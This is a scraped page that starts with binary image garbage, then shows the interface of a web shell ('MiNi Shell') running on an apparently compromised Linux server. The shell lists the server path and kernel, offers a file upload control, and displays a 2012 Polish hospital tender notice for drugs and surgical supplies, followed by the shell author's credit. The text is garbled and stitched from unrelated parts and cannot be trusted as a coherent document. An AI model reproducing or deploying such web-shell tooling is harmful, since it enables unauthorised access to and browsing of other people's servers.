JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120622/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120622/215708-N-2012.html

<p class="kh_header"><b>Sucha Beskidzka: Dostawa leków i obłożeń chirurgicznych
(uzupełnienie III)</b><br>
<b>Numer ogłoszenia: 215708 - 2012; data zamieszczenia: 22.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Opieki  Zdrowotnej , ul. Szpitalna 22, 34-200 Sucha Beskidzka, woj. małopolskie, tel. (033) 872 31 11, faks (033) 872 31 11.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zozsuchabeskidzka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa leków i obłożeń chirurgicznych
(uzupełnienie III).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa leków oraz obłożeń chirurgicznych określonych w pakietach 1-6..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.60.00.00-0, 33.19.80.00-4, 33.19.90.00-0, 33.70.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 10.07.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Oświadczenie o spełnianiu warunków udziału w postępowaniu stosownie do treści art. 22 ust.1 ustawy Pzp, że spełnia warunki dotyczące:
a) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,
Zezwolenie na obrót produktami leczniczymi:
kopia ważnego zezwolenia Głównego Inspektora Farmaceutycznego (GIF) w zakresie prowadzenia hurtowni farmaceutycznej lub w przypadku Dostawcy prowadzącego skład celny lub konsygnacyjny - zezwolenie na prowadzenie składu celnego lub konsygnacyjnego zawierające uprawnienie przyznane przez GIF w zakresie obrotu produktami leczniczymi.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Oświadczenie o spełnianiu warunków udziału w postępowaniu stosownie do treści art. 22 ust.1 ustawy Pzp, że spełnia warunki dotyczące:
a) posiadania wiedzy i doświadczenia,
2. W celu wykazania spełnienia warunku dotyczącego posiadania wiedzy i doświadczenia Zamawiający wymaga, aby dostawca wykonał co najmniej dwie dostawy w okresie ostatnich trzech lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, odpowiadających swoim rodzajem dostawom stanowiącym przedmiot zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Oświadczenie o spełnianiu warunków udziału w postępowaniu stosownie do treści art. 22 ust.1 ustawy Pzp, że spełnia warunki dotyczące:
a) dysponowania odpowiednim potencjałem technicznym</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Oświadczenie o spełnianiu warunków udziału w postępowaniu stosownie do treści art. 22 ust.1 ustawy Pzp, że spełnia warunki dotyczące:
a) dysponowania odpowiednimi osobami zdolnymi do wykonania zamówienia,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Oświadczenie o spełnianiu warunków udziału w postępowaniu stosownie do treści art. 22 ust.1 ustawy Pzp, że spełnia warunki dotyczące:
a) sytuacji ekonomicznej i finansowej</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dotyczy pakietu 1-5:
1.	Zmiana postanowień niniejszej umowy może być dokonana przez strony 
w formie pisemnej w drodze aneksu do niniejszej umowy, pod rygorem nieważności.
2.	Zmiany postanowień niniejszej umowy, są dopuszczalne wyłącznie w przypadku, gdy:
a)	nastąpiło obniżenie ceny jednostkowej asortymentu,
b)	w przypadku braku na rynku oferowanego preparatu, dopuszcza się możliwość 
    zaoferowania zamiennego preparatu w cenie przetargowej.
        c) zmiany cen urzędowych;
       d) zmiany stawki podatku VAT - związanej z przedmiotem umowy - w tym przypadku zmianie ulegnie kwota podatku VAT i cena brutto, cena netto pozostanie niezmienna, 
e) w przypadku zmiany stawki podatku VAT w ramach niniejszej umowy zmiana stawki następuje z dniem wejścia w życie aktu prawnego zmieniającego stawkę, a w przypadku zmiany stawek celnych wystąpienie o zmianę wymaga udokumentowanej formy pisemnej i zgody Zamawiającego.
Dotyczy pakietu 6
1.	Zmiana postanowień niniejszej umowy może być dokonana przez strony 
w formie pisemnej w drodze aneksu do niniejszej umowy, pod rygorem nieważności.
2.	Zmiany postanowień niniejszej umowy, są dopuszczalne wyłącznie w przypadku, gdy:
a)	nastąpiło obniżenie ceny jednostkowej asortymentu,
b)	nastąpila zmiana numeru katalogowego produktu
c)	sposobu konfekcjonowania
d)	liczby opakowań
e)	wystąpi przejściowy brak produktu z przyczyn leżacych po stronie producenta przy
jednoczesnym dostarczeniu produktu zamiennego o parametrach nie gorszych od
produktu objętego umową.
f)	zmiany stawki podatku VAT - związanej z przedmiotem umowy - w tym
przypadku zmianie ulegnie kwota podatku VAT i cena brutto, cena netto
pozostanie niezmienna, 
g)	w przypadku zmiany stawki podatku VAT w ramach niniejszej umowy zmiana
stawki następuje z dniem wejścia w życie aktu prawnego zmieniającego stawkę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zozsuchabeskidzka.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Zamówień Publicznych Zespołu Opieki Zdrowotnej Blok B, IV piętro, ul. Szpitalna 22, 34-200 Sucha Beskidzka.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.07.2012 godzina 10:00, miejsce: Sekretariat Zespołu Opieki Zdrowotnej Blok C, I piętro, ul. Szpitalna 22,34-200 Sucha Beskidzka.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są leki określone w pakiecie nr 1:
20 % emulsja tłuszczowa zawierająca olej sojowy 60 g, trójglicerydy MCT 60 g, oliwa z oliwek 50 g, olej rybi 30 g /1000 ml	100
Ampicilin 1 g fiol.	600
Benserazidum cum Levodopum 125 mg x 100	15
Benserazidum cum Levodopum 62,5 mg x 100	10
Buprenorphinum 35 mcg/h  (20 mg) x 5 plastrów	15
Buprenorphinum 52,5 mcg/h (30 mg) x 5 plastrów	10
Buprenorphinum 70 mcg/h (40 mg) x 5 plastrów	10
Clomipraminum 25 mg x 30 tabl.	20
Desmopresinum aceticum 120 mcg x 30 szt.	15
Digoxinum 0,1 mg x 30 tabl.	20
Drotaverinu h/ch 40 mg/2ml x 5 amp	800
Etoposidum 100 mg/5 ml fiol.	200
Haloperidol 1 mg x 40 tabl.	50
Haloperidol 5 mg x 30	50
Iloprostum 20 mg x 5 amp.	8
Levomepromazinum 25 mg x 50 tabl.	15
Lignocain h/ch 1 % 2 ml x 10	15
Methyldopa 250 mg x 50 tabl.	40
Mianserin 10 mg x 30 tabl.	20
Nutrienta - Nutrison 1000 ml + aparat do podawania grawitacyjnego	75
Nutrienta - Nutrison 1000 ml hiperkaloryczny + aparat do podawania grawitacyjnego	40
Nutrienta - Nutrison 1000 ml hiperkaloryczny wysokobiałkowy + aparat do podawania grawitacyjnego	40
Nutrienta - Nutrison 1000 ml normokaloryczny dla diabetyków + aparat do podawania grawitacyjnego	25
Nutrienta - Nutrison 1000 ml normokaloryczny dla pacjentów z odleżynamiy + aparat do podawania grawitacyjnego	25
Nutrienta - Nutrison 1000 ml normokaloryczny dla pacjentów z upośledzonym trawieniem + aparat do podawania grawitacyjnego	50
Nutrienta - Nutrison 1000 ml z błonnikiem + aparat do podawania grawitacyjnego	25
Nutrienta - Nutrison 500 ml hiperkaloryczny wysokobiałkowy dla krytycznie chorych + aparat do podawania grawitacyjnego	25
Nutrienta - Nutrison Powder bezresztowa bezglutenowa bezlaktozowa dieta 430 g	25
Teriparatidum 250 mcg/ ml 2,4 ml	8
Vancomycin 0,5 g fiol.	150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.60.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.01.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są leki okreslone w pakiecie nr 2:
Insulinum human injection neutral  3 ml x 5 wkładów	150
Insulinum human isophanicum (20/80) 3 ml x 5 wkładów	20
Insulinum human isophanicum (30/70) 3 ml x 5 wkładów	50
Insulinum human isophanicum (40/60) 3 ml x 5 wkładów	20
Insulinum human isophanicum (50/50) 3 ml x 5 wkładów	15
Insulinum human isophanicum 3 ml x 5 wkładów	80.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.60.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.01.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet nr 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są leki okreslone w pakiecie nr 3:
Acidum ibadronicum 3 mg/3ml	20
Amlodipin 10 mg x 30	100
Amlodipin 5 mg x 30 tbl.	200
Atorvastatin 20 mg x 30 tabl.	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.60.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.01.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet nr 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> przedmiotem zamówienia są leki okreslone w pakiecie nr 4:
Docetaxelum 80 mg/8 ml fopl.	25
Imipenem cum cilastatin 500 mg fiol.	150
Meropenem 1 g fiol	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.60.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.01.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet nr 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są środki pielęgnacyjne określone w pakiecie nr 5:
Emulsja do kąpieli tworząca na skórze aktywną okluzję zawierająca olej parafinowy (65%) trójglicerydy kwasu kaprylowego (7%) olej macadamia (3 %) masło shea (3 %) olej avocado (2 %) trójglicerydy ojeku z kukurydzy (2 %) palmitynian izopropylu (7,7 %) a 400 ml 	150
Gotowy do użycia preparat do mycia i dezynfekcji wrażliwych na działanie alkoholi powierzchni i sprzętu medycznego zawierający N-(3-aminopropylo)-N-dodecylopropano-1,3diaminę(0,31 %) chlorek didecylodimetyloamonium( 0,16%) chlorki benzyloC12-16alkilodimetylowe (0,0 3%) oraz czwartorzędowe związki amonowe związki powierzchniowo czynne a 750 ml	60.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.70.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.01.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet nr 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są obłożenia chorurgiczne i fartuchy określone w pakiecie nr 6:
Sterylny fartuch chirurgicznych wykonany z włókniny polipropylenowej typu SMMA, szwy łączone ultradźwiękowo, rękaw zakończony elasycznym mankietem z dzianiny, wiązany na troki łączone kartonikiem sterylne plecy, zapinany na szyji na rzep, długość fartucha 130 cm, długośc rękawa 77 cm, rozm L	szt	1000
Sterylny fartuch chirurgicznych wykonany z włókniny polipropylenowej typu SMMA, szwy łączone ultradźwiękowo, rękaw zakończony elasycznym mankietem z dzianiny, wiązany na troki łączone kartonikiem sterylne plecy, zapinany na szyji na rzep, długość fartucha 150 cm, długośc rękawa 88 cm, rozm XL	szt	1500
Sterylny zestaw do zabiegów na kończynie, serwet włókninowych 2W z dodatkowymi obszarami chłonnych wzmocnień chłonność min. 500% w obrębie pola operacyjnego, skład zestawu: 1 serweta na stolik narzedziowy 140x190cm wzmocnienie 75x190cm; 1 obłożenie stolika Mayo złożone teleskopowo 80x145cm wzmocnienie 60x80cm; 1 serweta do zabiegów na kończynie 320x245cm; 7x10cm wzmocnienie 150x105cm; 1 serweta pomocnicza 150x150cm; 1 osłona na kończynę 25x80cm; 2 taśmy samoprzylepne 10x50cm; 2 ręczniki celulozowe min. 30x30cm	kpl	80.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.80.00-4, 33.19.90.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com